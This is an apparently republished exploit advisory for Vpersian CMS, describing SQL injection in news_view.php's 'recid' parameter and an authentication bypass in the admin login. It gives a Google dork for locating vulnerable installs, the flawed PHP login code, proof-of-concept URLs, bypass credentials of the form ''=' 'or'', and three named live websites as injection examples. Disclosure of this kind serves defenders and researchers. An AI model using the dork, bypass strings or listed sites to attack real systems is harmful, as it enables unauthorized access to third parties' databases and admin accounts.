February 18

Vpersian CMS SQL Injection and Authentication bypass

####
#Exploit Title : Vpersian CMS SQL Injection and Authentication bypass
#Author : Abolfazl74
#Home page Link : http://vpersian.net
#Date : 03/02/2015
#Version: All versions
#Google dork: [intext:”VPersian CMS”]
#email : a.lovestory74@gmail.com
####

// Vulnerability Description:

SQL injection vulnerability:-
==============================
in file news_view.php data from GET parameter ‘recid’ is not getting filter before passing into SQL query and hence
rising SQL Injection vulnerability
——————-
POC
——————-

http://127.0.0.1/news_view.php?recid=SQL

Authentication Bypass:-
==============================
file index.php under directory admin has SQL injection vulnerability
parameter username and password suppliedin post parameter for checking valid admin username and password is not getting
filter before passing into SQL query which arise authentication bypass issue.
vulnerable code is
——————-
if(isset($_POST[login]))
{
$check=”select * from adminlogin where username=’$_POST[username]’ and password=’$_POST[username]'”;
$checkresult=mysql_query($check);
$checkcount=mysql_num_rows($checkresult);
if($checkcount>0)
{
$checkrow=mysql_fetch_array($checkresult);
$_SESSION[adminname]=$checkrow[adminname];
$_SESSION[adminloginstatus]=”success”;
echo “&ltscript>// “;
}
——————–
POC
——————–
Open admin page

http://127.0.0.1/admin/

username: ‘=’ ‘or’
password: ‘=’ ‘or’
#################################3
Example :

http://vpersian.net/news_view.php?recid=11%27

http://4tco.ir/news_view.php?recid=60%27

http://www.mtavoni.com/news_view.php?recid=3%27

Tags: ,

Related posts

Tags: ,
DEFCON Computer Security Archive

Posted February 18, 2015 by admin in category Uncategorized

Leave a Comment